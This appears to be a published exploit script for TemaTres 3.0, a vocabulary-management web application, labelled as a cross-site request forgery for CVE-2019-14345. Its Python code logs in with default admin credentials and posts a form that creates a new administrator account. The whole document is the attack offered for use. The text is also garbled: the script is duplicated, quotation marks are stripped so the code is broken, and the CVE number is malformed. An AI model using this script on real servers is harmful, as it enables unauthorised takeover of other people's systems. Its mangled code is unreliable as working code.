# Exploit Title: TemaTres 3.0 Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres 3.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 201914345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10
# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.
#Exploit
import requests
import sys
session = requests.Session()
http_proxy = http://127.0.0.1:8080"
https_proxy = https://127.0.0.1:8080"
proxyDict = {
http : http_proxy,
https : https_proxy
}
url = http://localhost/tematres/vocab/login.php'
values = {id_correo_electronico: [email protected],
id_password: admin,
task:login}
r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[PHPSESSID]
print (cookie)
host = sys.argv[1]
user = input([+]User:)
lastname = input([+]lastname:)
password = input([+]Password:)
password2 = input([+]Confirm Password:)
email = input([+]Email:)
if (password == password2):
#configure proxy burp
data = {
_nombre:user,
_apellido:lastname,
_correo_electronico:email,
orga:bypassed,
_clave
assword,
_confirmar_claveassword2,
isAdmin:1,
boton:Guardar,
userTask:A,
useactua:
}
headers= {
Cookie: PHPSESSID=+cookie
}
request = session.post(host+/tematres/vocab/admin.php, data=data,
headers=headers, proxies=proxyDict)
print(+ +)
print(Status Code:+ str(request.status_code))
else:
print (Passwords dont match!!!)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres 3.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 201914345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10
# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.
#Exploit
import requests
import sys
session = requests.Session()
http_proxy = http://127.0.0.1:8080"
https_proxy = https://127.0.0.1:8080"
proxyDict = {
http : http_proxy,
https : https_proxy
}
url = http://localhost/tematres/vocab/login.php'
values = {id_correo_electronico: [email protected],
id_password: admin,
task:login}
r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[PHPSESSID]
print (cookie)
host = sys.argv[1]
user = input([+]User:)
lastname = input([+]lastname:)
password = input([+]Password:)
password2 = input([+]Confirm Password:)
email = input([+]Email:)
if (password == password2):
#configure proxy burp
data = {
_nombre:user,
_apellido:lastname,
_correo_electronico:email,
orga:bypassed,
_clave
assword,_confirmar_clave
assword2,isAdmin:1,
boton:Guardar,
userTask:A,
useactua:
}
headers= {
Cookie: PHPSESSID=+cookie
}
request = session.post(host+/tematres/vocab/admin.php, data=data,
headers=headers, proxies=proxyDict)
print(+ +)
print(Status Code:+ str(request.status_code))
else:
print (Passwords dont match!!!)
